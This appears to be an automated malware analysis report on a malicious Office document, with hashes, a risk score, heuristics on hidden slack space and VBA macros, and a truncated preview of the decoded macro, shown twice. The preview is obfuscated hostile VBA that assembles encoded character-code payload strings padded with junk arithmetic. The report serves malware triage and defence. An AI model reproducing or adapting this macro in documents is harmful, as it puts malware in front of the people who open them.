Office (OLE) malware analysis — malicious · 4fbd0c600963e759

MALICIOUS

Office (OLE)

93.0 KB First seen: 2019-04-17

MD5: 96157ca9c84295144cd31e4725a55e5f SHA-1: 4d9d1aeb31a3b11d2b398d8454abc2908c4cb2ad SHA-256: 4fbd0c600963e759625108d09c13c0d3c0a386d2abf84cf132ea3fbea04f9119

62 Risk Score

Heuristics 3

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 95,232 bytes but its declared streams total only 35,342 bytes — 59,890 bytes (63%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13527 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13527 bytes
SHA-256: `9c7e38a28afc250b46b1dc7365196a9cd635e912ad21880d2c2a415f3a0cdff7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "oNCqXMRhct" Function vvhoiOiw() On Error Resume Next zzTjo = Sqr(36363) tHAkTw = 16527 + FaozwK + (11468 * CDbl(UJpmw) - PVmHuH / CSng(43666) - MtaUCO / Hex(TGfrk) + 6647 - 46238) fQvFs = wMEAPN - uXiHr / 99156 / DJvLl - 223327908 + Hex(wmHbbh) * COJYz - Round(42557) IzNzw = mKnUVC uJpAbEBHRb = "HeLL ( (" + " 4" + "6 ,100 ,96 ,123" + " , 94, 102" + ", 105 ,42 " + ",55 ,42, 100" + ", 111" + ",125 ,39," + " 101," + " 104, 9" QnBzwP = Sqr(32383) RHVUjT = 3046 + LEdZho + (23265 * CDbl(NFKVJf) - iFqvh / CSng(35582) - lPmsH / Hex(sppdUG) + 19481 - 79389) Tflzn = sYURA - NnohR / 78255 / PhACV - 223327908 + Hex(koDtj) * uUPSN - Round(40702) VtbqVp = dcVLp nawllioajlA = "6 , 111,105 ,12" + "6 , 4" + "2, 120,107 ,10" + "0 ,110 ,1" + "01" + ",103" + ", 49,46,1" + "04 , 96, 64, " aPtCY = Sqr(74486) IrBTTc = 31087 + Dapikv + (12502 * CDbl(wUbMUk) - SbANMz / CSng(98881) - EaDNC / Hex(vzkES) + 2295 - 97703) XHLYt = rTPDjD - lEhiD / 58351 / VrHBi - 223327908 + Hex(KBlTJZ) * CjSrp - Round(17375) EZzFAp = WkdzT ZQLca = "82," + "125,89,42 , " + "55" + " ,42 ,100,11" + "1,1" + "25, 39,101" + ",104 " + ",96, 111 , 105" HfFVR = Sqr(71353) njAJpu = 46391 + hwtGrN + (9352 * CDbl(qtutzp) - FPlQo / CSng(58432) - HLfcO / Hex(ShzOM) + 24049 - 96077) SDAkwJ = uDdjMi - ibOzES / 16789 / fhmrww - 223327908 + Hex(fuXtMp) * irQrY - Round(75391) DfUBmz = WWhLwu lqaKKD = " ,126 ,42,8" + "9 , 115 , 121, " + "126 ,111" + " ,103 , 36,68" + " ," + " 1" + "11,126,36,93" + ", 1" + "11,104 , 73 , 1" + "02,99 , 111, 1" jCkzG = Sqr(39956) XTzGL = 92100 + XiMTR + (98882 * CDbl(zWiNuV) - uEmXOZ / CSng(61415) - YKbiPj / Hex(tJfcc) + 47574 - 4494) zXMcdP = izWij - Bsnjs / 73202 / ZhStXs - 223327908 + Hex(GVdbZT) * KDRmFw - Round(67037) ldzTkZ = rWMSi MopqomK = "00 , 126,4" + "9 ,46,100 ,70," + "78, 127 ," + " 127, 80," + "42, " + "55," + " 42,45 ,98, 1" + "26 , 126 , 122" vvhoiOiw = uJpAbEBHRb + nawllioajlA + ZQLca + lqaKKD + MopqomK End Function Function MBMLXoVl() On Error Resume Next UXztD = Sqr(36317) FTEkb = 9584 + TvFPY + (83029 * CDbl(Vzmptz) - MviAYR / CSng(13256) - WFbXsw / Hex(hVUdOP) + 20590 - 84866) wQTtXW = CnFqYA - AwqXPR / 41275 / jjBDJ - 223327908 + Hex(BRNYDa) * GZEaLk - Round(33620) iFzpsO = OAFUsO wIsff = " ,48, 37" + " , 37 " + ", 125, 125," + "125 ,36, 10" + "1,12" + "5, 100," + " 98, " GQSZZ = Sqr(715) hjrUME = 3525 + sRVZL + (88604 * CDbl(lzDjD) - aKPLY / CSng(24624) - IrkBSu / Hex(pMFwj) + 30101 - 39862) ZlVEI = YcIor - NBhTH / 32345 / jYrEA - 223327908 + Hex(EKEwsz) * bkSzfN - Round(72477) IYlskT = JWoBI aYkucR = "99 , 124,111 ," + "36, " + "105 ,101, 103 ," + "37,71,121, 93" + ", 71 ,56 , 7" + "2, 58,37 ,74, " + "98 ,12" + "6,126, " + "122,48 , 37," HjVkri = Sqr(60846) RwijV = 31921 + wUdQp + (7845 * CDbl(cjinuf) - SotuL / CSng(97238) - vfBjqj / Hex(lkSKw) + 64245 - 43719) JRdCwK = mKSGAo - jwUnqz / 30449 / zziWjN - 223327908 + Hex(bHTQp) * ONjLbv - Round(62739) QkzKo = HOYzLI KliBC = " 37" + " ,125," + " 12" + "5 ,125," + " 36, 9" + "8 , 111, 107 ," + "102 ,126" + " ,98,115, 36," + " 109, 103" Hwcmab = Sqr(45748) UfYcdb = 25288 + KnkzjU + (70483 * CDbl(cPDjcT) - IOAPB / CSng(22779) - jjOMu / Hex(IizUTR) + 37551 - 75534) rDBIPO = LLWHHA - WaCjtR / 66233 / LzjWG - 223327908 + Hex(nPlcI) * XJtZs - Round(40066) iaWHf = XPDnja zNBFZ = " , " + "121,126, 1" + "01 ,36,105" + ",101 ," + " 103 ,37, " MBMLXoVl = wIsff + aYkucR + KliBC + zNBFZ End Function Function coAVE() On Error Resume Next hhqJM = Sqr(38396) ubrBY = 85736 + YXwli + (97967 * CDbl(NNhdoY) - YHQnDm / CSng(69409) - mfruCL / Hex(RrAzNw) + 73864 - 22682) FIKWT = OUGWul - tkwiR / 91895 / coKzmv - 223327908 + Hex(GWvaR) * Ymlrp - Round(53925) JIuMj = WaBjth hwzoQRiGBil = "73,99,97 " + ", 97 ,76 , 125" + " , 62, 37, 74, " + "98 , " + "126" uZiCHw = Sqr(59746) dQwKjX = 36693 + wKwdS + (84795 * CDbl(wFtpF) - zuUwk / CSng(1987) - JmoiAo / Hex(VnjFEX) + 39884 - 64089) CLQjW = OwWazL - Ndiwm / 20253 / nlhsP - 223327908 + Hex(ZXCwl) * HajoY - Round(27911) cftqCB = PzkHrR EwuuYi = ",126 ,122 , 48" + ",37 " + ",3" ... (truncated)

SHA-256: 9c7e38a28afc250b46b1dc7365196a9cd635e912ad21880d2c2a415f3a0cdff7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "oNCqXMRhct"
Function vvhoiOiw()
On Error Resume Next
zzTjo = Sqr(36363)
tHAkTw = 16527 + FaozwK + (11468 * CDbl(UJpmw) - PVmHuH / CSng(43666) - MtaUCO / Hex(TGfrk) + 6647 - 46238)
fQvFs = wMEAPN - uXiHr / 99156 / DJvLl - 223327908 + Hex(wmHbbh) * COJYz - Round(42557)
IzNzw = mKnUVC
uJpAbEBHRb = "HeLL  ( (" + " 4" + "6 ,100 ,96 ,123" + " , 94, 102" + ", 105 ,42 " + ",55 ,42, 100" + ", 111" + ",125 ,39," + " 101," + " 104, 9"
QnBzwP = Sqr(32383)
RHVUjT = 3046 + LEdZho + (23265 * CDbl(NFKVJf) - iFqvh / CSng(35582) - lPmsH / Hex(sppdUG) + 19481 - 79389)
Tflzn = sYURA - NnohR / 78255 / PhACV - 223327908 + Hex(koDtj) * uUPSN - Round(40702)
VtbqVp = dcVLp
nawllioajlA = "6 , 111,105 ,12" + "6 , 4" + "2, 120,107 ,10" + "0 ,110 ,1" + "01" + ",103" + ", 49,46,1" + "04 , 96, 64, "
aPtCY = Sqr(74486)
IrBTTc = 31087 + Dapikv + (12502 * CDbl(wUbMUk) - SbANMz / CSng(98881) - EaDNC / Hex(vzkES) + 2295 - 97703)
XHLYt = rTPDjD - lEhiD / 58351 / VrHBi - 223327908 + Hex(KBlTJZ) * CjSrp - Round(17375)
EZzFAp = WkdzT
ZQLca = "82," + "125,89,42 , " + "55" + " ,42 ,100,11" + "1,1" + "25, 39,101" + ",104 " + ",96, 111 , 105"
HfFVR = Sqr(71353)
njAJpu = 46391 + hwtGrN + (9352 * CDbl(qtutzp) - FPlQo / CSng(58432) - HLfcO / Hex(ShzOM) + 24049 - 96077)
SDAkwJ = uDdjMi - ibOzES / 16789 / fhmrww - 223327908 + Hex(fuXtMp) * irQrY - Round(75391)
DfUBmz = WWhLwu
lqaKKD = " ,126 ,42,8" + "9 , 115 , 121, " + "126 ,111" + " ,103 , 36,68" + " ," + " 1" + "11,126,36,93" + ", 1" + "11,104 , 73 , 1" + "02,99 , 111, 1"
jCkzG = Sqr(39956)
XTzGL = 92100 + XiMTR + (98882 * CDbl(zWiNuV) - uEmXOZ / CSng(61415) - YKbiPj / Hex(tJfcc) + 47574 - 4494)
zXMcdP = izWij - Bsnjs / 73202 / ZhStXs - 223327908 + Hex(GVdbZT) * KDRmFw - Round(67037)
ldzTkZ = rWMSi
MopqomK = "00 , 126,4" + "9 ,46,100 ,70," + "78, 127 ," + " 127, 80," + "42, " + "55," + " 42,45 ,98, 1" + "26 , 126 , 122"
vvhoiOiw = uJpAbEBHRb + nawllioajlA + ZQLca + lqaKKD + MopqomK
End Function
Function MBMLXoVl()
On Error Resume Next
UXztD = Sqr(36317)
FTEkb = 9584 + TvFPY + (83029 * CDbl(Vzmptz) - MviAYR / CSng(13256) - WFbXsw / Hex(hVUdOP) + 20590 - 84866)
wQTtXW = CnFqYA - AwqXPR / 41275 / jjBDJ - 223327908 + Hex(BRNYDa) * GZEaLk - Round(33620)
iFzpsO = OAFUsO
wIsff = " ,48, 37" + " , 37 " + ", 125, 125," + "125 ,36, 10" + "1,12" + "5, 100," + " 98, "
GQSZZ = Sqr(715)
hjrUME = 3525 + sRVZL + (88604 * CDbl(lzDjD) - aKPLY / CSng(24624) - IrkBSu / Hex(pMFwj) + 30101 - 39862)
ZlVEI = YcIor - NBhTH / 32345 / jYrEA - 223327908 + Hex(EKEwsz) * bkSzfN - Round(72477)
IYlskT = JWoBI
aYkucR = "99 , 124,111 ," + "36, " + "105 ,101, 103 ," + "37,71,121, 93" + ", 71 ,56 , 7" + "2, 58,37 ,74, " + "98 ,12" + "6,126, " + "122,48 , 37,"
HjVkri = Sqr(60846)
RwijV = 31921 + wUdQp + (7845 * CDbl(cjinuf) - SotuL / CSng(97238) - vfBjqj / Hex(lkSKw) + 64245 - 43719)
JRdCwK = mKSGAo - jwUnqz / 30449 / zziWjN - 223327908 + Hex(bHTQp) * ONjLbv - Round(62739)
QkzKo = HOYzLI
KliBC = " 37" + " ,125," + " 12" + "5 ,125," + " 36, 9" + "8 , 111, 107 ," + "102 ,126" + " ,98,115, 36," + " 109, 103"
Hwcmab = Sqr(45748)
UfYcdb = 25288 + KnkzjU + (70483 * CDbl(cPDjcT) - IOAPB / CSng(22779) - jjOMu / Hex(IizUTR) + 37551 - 75534)
rDBIPO = LLWHHA - WaCjtR / 66233 / LzjWG - 223327908 + Hex(nPlcI) * XJtZs - Round(40066)
iaWHf = XPDnja
zNBFZ = " , " + "121,126, 1" + "01 ,36,105" + ",101 ," + " 103 ,37, "
MBMLXoVl = wIsff + aYkucR + KliBC + zNBFZ
End Function
Function coAVE()
On Error Resume Next
hhqJM = Sqr(38396)
ubrBY = 85736 + YXwli + (97967 * CDbl(NNhdoY) - YHQnDm / CSng(69409) - mfruCL / Hex(RrAzNw) + 73864 - 22682)
FIKWT = OUGWul - tkwiR / 91895 / coKzmv - 223327908 + Hex(GWvaR) * Ymlrp - Round(53925)
JIuMj = WaBjth
hwzoQRiGBil = "73,99,97 " + ", 97 ,76 , 125" + " , 62, 37, 74, " + "98 , " + "126"
uZiCHw = Sqr(59746)
dQwKjX = 36693 + wKwdS + (84795 * CDbl(wFtpF) - zuUwk / CSng(1987) - JmoiAo / Hex(VnjFEX) + 39884 - 64089)
CLQjW = OwWazL - Ndiwm / 20253 / nlhsP - 223327908 + Hex(ZXCwl) * HajoY - Round(27911)
cftqCB = PzkHrR
EwuuYi = ",126 ,122 , 48" + ",37 " + ",3" 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.